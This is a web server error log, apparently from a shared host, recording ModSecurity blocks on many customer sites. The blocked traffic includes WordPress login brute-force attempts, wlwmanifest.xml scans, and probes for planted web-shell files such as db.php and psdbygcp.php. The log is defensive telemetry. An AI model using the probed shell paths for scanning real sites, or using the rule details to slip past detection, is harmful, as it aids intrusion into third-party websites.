[Tue May 26 19:13:32.521610 2026] [security2:error] [pid 18465:tid 18704] [client 113.160.132.26:21999] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 26.132.160.113.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWjhE6GHndkguR9cLKVZwAAAGw"], referer: https://anujtradingco.com/wp-login.php?action=register
[Tue May 26 19:13:32.589199 2026] [security2:error] [pid 18465:tid 18678] [client 45.92.1.242:59196] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "systemprintsn.azurmediatec.com"] [uri "/news/wp-includes/wlwmanifest.xml"] [unique_id "ahWjhE6GHndkguR9cLKVfAAAAFI"]
[Tue May 26 19:13:32.893431 2026] [security2:error] [pid 18465:tid 18667] [client 45.92.1.242:55875] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "systemprintsn.azurmediatec.com"] [uri "/2018/wp-includes/wlwmanifest.xml"] [unique_id "ahWjhE6GHndkguR9cLKVjwAAAEc"]
[Tue May 26 19:13:33.183730 2026] [security2:error] [pid 18465:tid 18705] [client 45.92.1.242:53160] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "systemprintsn.azurmediatec.com"] [uri "/shop/wp-includes/wlwmanifest.xml"] [unique_id "ahWjhU6GHndkguR9cLKVmQAAAG0"]
[Tue May 26 19:13:33.492217 2026] [security2:error] [pid 18465:tid 18634] [client 45.92.1.242:51075] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "systemprintsn.azurmediatec.com"] [uri "/wp1/wp-includes/wlwmanifest.xml"] [unique_id "ahWjhU6GHndkguR9cLKVrQAAACY"]
[Tue May 26 19:13:33.626380 2026] [security2:error] [pid 18465:tid 18689] [client 85.208.96.212:62060] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/dance/day/2026-04-20/"] [unique_id "ahWjhU6GHndkguR9cLKVtQAAAF0"]
[Tue May 26 19:13:33.626472 2026] [security2:error] [pid 18465:tid 18689] [client 85.208.96.212:62060] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/dance/day/2026-04-20/"] [unique_id "ahWjhU6GHndkguR9cLKVtQAAAF0"]
[Tue May 26 19:13:33.645799 2026] [security2:error] [pid 18465:tid 18552] [remote 141.95.202.18:51624] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 18.202.95.141.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWjhU6GHndkguR9cLKVqAAAL1Y"]
[Tue May 26 19:13:33.798291 2026] [security2:error] [pid 18465:tid 18607] [client 45.92.1.242:62771] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "systemprintsn.azurmediatec.com"] [uri "/test/wp-includes/wlwmanifest.xml"] [unique_id "ahWjhU6GHndkguR9cLKVwwAAAAw"]
[Tue May 26 19:13:33.830816 2026] [security2:error] [pid 18465:tid 18564] [remote 199.247.4.24:35324] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 24.4.247.199.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWjhU6GHndkguR9cLKVvwAASmI"]
[Tue May 26 19:13:33.914362 2026] [security2:error] [pid 18465:tid 18606] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjhU6GHndkguR9cLKVrAAAAAs"]
[Tue May 26 19:13:34.085615 2026] [security2:error] [pid 18465:tid 18680] [client 45.92.1.242:64853] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "systemprintsn.azurmediatec.com"] [uri "/wp2/wp-includes/wlwmanifest.xml"] [unique_id "ahWjhk6GHndkguR9cLKVygAAAFQ"]
[Tue May 26 19:13:34.373414 2026] [security2:error] [pid 18465:tid 18690] [client 45.92.1.242:54044] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "systemprintsn.azurmediatec.com"] [uri "/cms/wp-includes/wlwmanifest.xml"] [unique_id "ahWjhk6GHndkguR9cLKV3AAAAF4"]
[Tue May 26 19:13:34.389490 2026] [proxy:error] [pid 18465:tid 18472] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:13:34.389558 2026] [proxy_http:error] [pid 18465:tid 18472] [remote 205.210.31.146:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:13:34.390296 2026] [proxy:error] [pid 18465:tid 18472] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:13:34.390345 2026] [proxy_http:error] [pid 18465:tid 18472] [remote 205.210.31.146:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:13:35.851268 2026] [security2:error] [pid 18465:tid 18691] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjh06GHndkguR9cLKWGgAAAF8"]
[Tue May 26 19:13:36.277559 2026] [security2:error] [pid 18465:tid 18598] [client 113.160.132.26:3165] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "113.160.132.26" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1090"] [id "999022"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWjiE6GHndkguR9cLKWOwAAAAM"], referer: https://anujtradingco.com/wp-login.php?action=register
[Tue May 26 19:13:38.013004 2026] [security2:error] [pid 18465:tid 18687] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjiU6GHndkguR9cLKWhAAAAFs"]
[Tue May 26 19:13:38.068818 2026] [security2:error] [pid 18465:tid 18665] [client 47.128.16.163:23640] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "pstta.in"] [uri "/cgi-sys/404.html"] [unique_id "ahWjik6GHndkguR9cLKWnAAAAEU"]
[Tue May 26 19:13:39.999825 2026] [security2:error] [pid 18465:tid 18596] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWji06GHndkguR9cLKW6gAAAAE"]
[Tue May 26 19:13:41.365635 2026] [security2:error] [pid 18465:tid 18671] [client 74.7.228.36:35814] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "deeigo.com"] [uri "/public/index.php"] [unique_id "ahWjjE6GHndkguR9cLKXIAAAS0o"]
[Tue May 26 19:13:41.365669 2026] [security2:error] [pid 18465:tid 18671] [client 74.7.228.36:35814] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "deeigo.com"] [uri "/public/index.php"] [unique_id "ahWjjE6GHndkguR9cLKXIAAAS0o"]
[Tue May 26 19:13:42.575241 2026] [security2:error] [pid 18465:tid 18675] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjjk6GHndkguR9cLKXZwAAAE8"]
[Tue May 26 19:13:44.703901 2026] [security2:error] [pid 18465:tid 18599] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjkE6GHndkguR9cLKX0wAAAAQ"]
[Tue May 26 19:13:45.310982 2026] [security2:error] [pid 18465:tid 18634] [client 193.37.33.130:62081] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 130.33.37.193.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "afstpaul.org"] [uri "/wp-login.php"] [unique_id "ahWjkE6GHndkguR9cLKX9AAAACY"]
[Tue May 26 19:13:45.781585 2026] [security2:error] [pid 18465:tid 18720] [client 114.119.138.36:38413] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/"] [unique_id "ahWjkU6GHndkguR9cLKYIwAAAHw"], referer: https://theafterglow-centre.com/events/list/?tribe-bar-date=2023-08-24&eventDisplay=past
[Tue May 26 19:13:46.114805 2026] [security2:error] [pid 18465:tid 18603] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjkU6GHndkguR9cLKYHgAAAAg"]
[Tue May 26 19:13:46.389397 2026] [fcgid:warn] [pid 18465:tid 18651] (70014)End of file found: [client 66.132.172.177:43380] mod_fcgid: can't get data from http client
[Tue May 26 19:13:47.642467 2026] [security2:error] [pid 18465:tid 18692] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjk06GHndkguR9cLKYdAAAAGA"]
[Tue May 26 19:13:48.326803 2026] [security2:error] [pid 18465:tid 18503] [remote 173.212.233.81:54394] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 81.233.212.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWjlE6GHndkguR9cLKYqAAAGCU"]
[Tue May 26 19:13:48.565548 2026] [security2:error] [pid 18465:tid 18506] [remote 173.212.233.81:54394] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 81.233.212.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWjlE6GHndkguR9cLKYwgAAByg"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:13:49.275037 2026] [security2:error] [pid 18465:tid 18516] [remote 167.172.25.98:56438] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 98.25.172.167.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWjlU6GHndkguR9cLKY4wAAYzI"]
[Tue May 26 19:13:49.389821 2026] [security2:error] [pid 18465:tid 18608] [client 35.213.179.237:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "theafterglow-centre.com"] [uri "/index.php"] [unique_id "ahWjlU6GHndkguR9cLKY5AAAAA0"]
[Tue May 26 19:13:50.328534 2026] [security2:error] [pid 18465:tid 18667] [client 222.252.77.84:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjlU6GHndkguR9cLKZGAAAAEc"]
[Tue May 26 19:13:50.340410 2026] [security2:error] [pid 18465:tid 18604] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjlU6GHndkguR9cLKZGwAAAAk"]
[Tue May 26 19:13:51.768924 2026] [security2:error] [pid 18465:tid 18651] [client 35.213.179.237:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.theafterglow-centre.com"] [uri "/index.php"] [unique_id "ahWjl06GHndkguR9cLKZdQAAADc"]
[Tue May 26 19:13:52.145967 2026] [security2:error] [pid 18465:tid 18668] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjl06GHndkguR9cLKZewAAAEg"]
[Tue May 26 19:13:54.196792 2026] [security2:error] [pid 18465:tid 18720] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjmU6GHndkguR9cLKZ4gAAAHw"]
[Tue May 26 19:13:55.681453 2026] [security2:error] [pid 18465:tid 18610] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjm06GHndkguR9cLKaMQAAAA8"]
[Tue May 26 19:13:58.584472 2026] [security2:error] [pid 18465:tid 18639] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjnk6GHndkguR9cLKayQAAACs"]
[Tue May 26 19:13:59.379383 2026] [security2:error] [pid 18465:tid 18497] [remote 161.97.109.81:42282] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 81.109.97.161.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWjn06GHndkguR9cLKa_AAAHB8"]
[Tue May 26 19:13:59.676890 2026] [security2:error] [pid 18465:tid 18514] [remote 161.97.109.81:42282] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 81.109.97.161.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWjn06GHndkguR9cLKbEQAAEzA"], referer: https://yourstorybag.com/wp-login.php
[Tue May 26 19:14:00.126587 2026] [security2:error] [pid 18465:tid 18639] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjn06GHndkguR9cLKbFwAAACs"]
[Tue May 26 19:14:01.907215 2026] [security2:error] [pid 18465:tid 18719] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjoU6GHndkguR9cLKbbwAAAHs"]
[Tue May 26 19:14:03.668898 2026] [security2:error] [pid 18465:tid 18469] [remote 38.95.35.74:34082] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 74.35.95.38.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWjo06GHndkguR9cLKb4gAAHQM"]
[Tue May 26 19:14:03.894903 2026] [security2:error] [pid 18465:tid 18559] [remote 38.95.35.74:34082] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 74.35.95.38.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWjo06GHndkguR9cLKb8QAAPF0"], referer: https://yourstorybag.com/wp-login.php
[Tue May 26 19:14:04.423210 2026] [security2:error] [pid 18465:tid 18661] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjo06GHndkguR9cLKb_wAAAEE"]
[Tue May 26 19:14:06.523075 2026] [security2:error] [pid 18465:tid 18484] [remote 51.91.98.45:35382] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 45.98.91.51.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWjpk6GHndkguR9cLKcewAAdRI"]
[Tue May 26 19:14:07.214898 2026] [security2:error] [pid 18465:tid 18610] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjpk6GHndkguR9cLKciwAAAA8"]
[Tue May 26 19:14:08.668830 2026] [security2:error] [pid 18465:tid 18678] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjqE6GHndkguR9cLKc0gAAAFI"]
[Tue May 26 19:14:10.557622 2026] [security2:error] [pid 18465:tid 18624] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjqk6GHndkguR9cLKdRgAAABw"]
[Tue May 26 19:14:10.829010 2026] [security2:error] [pid 18465:tid 18545] [remote 194.213.4.139:53500] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 139.4.213.194.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWjqk6GHndkguR9cLKdZQAACk8"]
[Tue May 26 19:14:11.221227 2026] [security2:error] [pid 18465:tid 18524] [remote 209.74.72.122:45342] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 122.72.74.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWjq06GHndkguR9cLKddQAASTo"]
[Tue May 26 19:14:12.292861 2026] [security2:error] [pid 18465:tid 18617] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjq06GHndkguR9cLKdqAAAABU"]
[Tue May 26 19:14:12.323975 2026] [security2:error] [pid 18465:tid 18468] [remote 209.74.72.122:45342] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 122.72.74.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWjrE6GHndkguR9cLKdwQAAYQI"], referer: https://obinnawrites.com/wp-login.php
[Tue May 26 19:14:12.700444 2026] [security2:error] [pid 18465:tid 18563] [remote 194.213.4.139:53500] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 139.4.213.194.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWjrE6GHndkguR9cLKd1QAALGE"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:14:13.193212 2026] [security2:error] [pid 18465:tid 18469] [remote 103.95.119.103:51668] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.119.95.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWjrU6GHndkguR9cLKd7gAABgM"]
[Tue May 26 19:14:13.865979 2026] [security2:error] [pid 18465:tid 18651] [client 46.175.155.214:51244] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahWjrE6GHndkguR9cLKd3wAAADc"], referer: https://www.cagmedya.com/web-tasarim-ajansi/
[Tue May 26 19:14:13.941037 2026] [security2:error] [pid 18465:tid 18700] [client 20.151.111.128:4667] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "glorodavionics.com"] [uri "/wp-plain.php"] [unique_id "ahWjrU6GHndkguR9cLKeHgAAAGg"], referer: www.google.com
[Tue May 26 19:14:13.978444 2026] [security2:error] [pid 18465:tid 18626] [client 20.151.111.128:4610] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "glorodavionics.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWjrU6GHndkguR9cLKeJAAAAB4"], referer: www.google.com
[Tue May 26 19:14:14.040839 2026] [security2:error] [pid 18465:tid 18618] [client 20.151.111.128:4648] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "glorodavionics.com"] [uri "/psdbygcp.php"] [unique_id "ahWjrk6GHndkguR9cLKeKQAAABY"], referer: www.google.com
[Tue May 26 19:14:14.872965 2026] [security2:error] [pid 18465:tid 18608] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjrk6GHndkguR9cLKeQQAAAA0"]
[Tue May 26 19:14:14.922740 2026] [security2:error] [pid 18465:tid 18600] [client 113.166.212.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjrk6GHndkguR9cLKeRwAAAAU"]
[Tue May 26 19:14:15.353884 2026] [security2:error] [pid 18465:tid 18584] [remote 216.73.216.30:30417] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWjr06GHndkguR9cLKecwAANnY"]
